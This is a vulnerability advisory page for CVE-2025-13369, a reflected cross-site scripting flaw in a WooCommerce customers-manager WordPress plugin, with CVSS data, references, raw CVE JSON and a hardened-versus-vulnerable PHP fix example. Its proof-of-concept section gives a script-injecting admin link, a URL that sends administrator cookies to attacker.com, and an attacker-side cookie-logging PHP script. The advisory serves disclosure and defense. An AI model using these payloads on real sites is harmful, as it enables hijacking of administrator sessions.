Security Vulnerability Report
CVE-2025-13369 CVSS 6.1 MEDIUM


Published: 2026-01-07 12:16:47
Last Modified: 2026-04-15 00:35:42

Description

The Premmerce WooCommerce Customers Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'money_spent_from', 'money_spent_to', 'registered_from', and 'registered_to' parameters in all versions up to, and including, 1.1.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

Premmerce WooCommerce Customers Manager ≤ 1.1.14 (no structured configuration/CPE data is available for this record)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML / PHP
<!-- CVE-2025-13369 Reflected XSS PoC -->
<!-- Trick the administrator into visiting the following malicious URL -->
<a href="http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers&money_spent_from="><script>alert(document.cookie)</script>">点击查看促销信息</a>

<!-- Or the directly constructed URL -->
<!-- http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers&money_spent_from="><script>document.location='https://attacker.com/steal?c='+document.cookie</script> -->

<!-- Attacker-side receiving script (steal.php) -->
<?php
if (isset($_GET['c'])) {
    $cookie = $_GET['c'];
    $log = fopen('cookies.log', 'a');
    fwrite($log, $cookie . "\n");
    fclose($log);
    // Optional: redirect back to the original site to reduce suspicion
    header('Location: http://target-wordpress-site.com/wp-admin/admin.php?page=premmerce-customers');
}
?>
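The advisory attributes the flaw to insufficient input sanitization and output escaping of filter parameters that are reflected back into the admin page. The example below is added here and is not the plugin's code: the form markup, the function names and the sample input are assumed. It contrasts a filter field that echoes the `money_spent_from` query value straight into an attribute with a hardened version that normalizes the value and escapes it for the attribute context using WordPress's own helpers; minimal stand-ins are defined so the file also runs outside WordPress.

```php
<?php
// Added example, not the plugin's code. Hypothetical admin filter field that
// reflects a GET parameter into an input's value attribute, shown in a
// vulnerable form and a hardened form.

// Stand-ins so this runs outside WordPress. Inside WordPress the real
// esc_attr()/sanitize_text_field()/wp_unslash() are used; these approximate them.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        // Encode quotes and angle brackets so the value cannot end the attribute or tag.
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field(string $str): string {
        // Drop tags and collapse whitespace, roughly what the WordPress helper does.
        return trim(preg_replace('/[\r\n\t ]+/', ' ', strip_tags($str)));
    }
}
if (!function_exists('wp_unslash')) {
    function wp_unslash(string $value): string {
        return stripslashes($value);
    }
}

// VULNERABLE pattern: the raw query value is concatenated into the attribute.
// A value such as  "><script>...  closes the attribute and the tag, and the
// injected markup is rendered for whoever loads the filtered page.
function render_filter_vulnerable(array $get): string {
    $from = isset($get['money_spent_from']) ? (string) $get['money_spent_from'] : '';
    return '<input type="text" name="money_spent_from" value="' . $from . '">';
}

// HARDENED pattern: unslash and sanitize on input, then escape for the
// attribute context at output. The output escaping is what prevents the
// injection; sanitizing first keeps tags and stray whitespace out of the
// filter value that is later reused in the query.
function render_filter_hardened(array $get): string {
    $from = '';
    if (isset($get['money_spent_from'])) {
        $from = sanitize_text_field(wp_unslash((string) $get['money_spent_from']));
    }
    return '<input type="text" name="money_spent_from" value="' . esc_attr($from) . '">';
}

// Constructed sample input that mimics the injection shape from the advisory.
$sample = ['money_spent_from' => '"><script>alert(1)</script>'];

// The first line shows the broken-out attribute; the second keeps the whole
// value inside the quotes as encoded text.
echo render_filter_vulnerable($sample), PHP_EOL;
echo render_filter_hardened($sample), PHP_EOL;
```

The same treatment applies to the other three parameters named in the advisory (`money_spent_to`, `registered_from`, `registered_to`); the rule is to escape every reflected value with the function matching its output context (`esc_attr()` for attributes, `esc_html()` for element text, `esc_url()` for hrefs) rather than relying on input sanitization alone.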

References

https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/src/Admin/Admin.php#L135
https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/views/admin/filter.php#L43
https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/src/Admin/Admin.php#L135
https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/views/admin/filter.php#L43
https://plugins.trac.wordpress.org/changeset/3465273/
https://www.wordfence.com/threat-intel/vulnerabilities/id/9980ec20-60ae-42eb-a2cd-146e57435398?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13369", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:47.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Premmerce WooCommerce Customers Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'money_spent_from', 'money_spent_to', 'registered_from', and 'registered_to' parameters in all versions up to, and including, 1.1.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Premmerce WooCommerce Customers Manager para WordPress es vulnerable a cross-site scripting reflejado a través de los parámetros 'money_spent_from', 'money_spent_to', 'registered_from' y 'registered_to' en todas las versiones hasta la 1.1.14, inclusive, debido a una sanitización de entrada insuficiente y un escape de salida inadecuado. Esto hace posible que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutan si logran engañar a un administrador para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/src/Admin/Admin.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/views/admin/filter.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/src/Admin/Admin.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/views/admin/filter.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3465273/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9980ec20-60ae-42eb-a2cd-146e57435398?source=cve", "source": "[email protected]"}]}}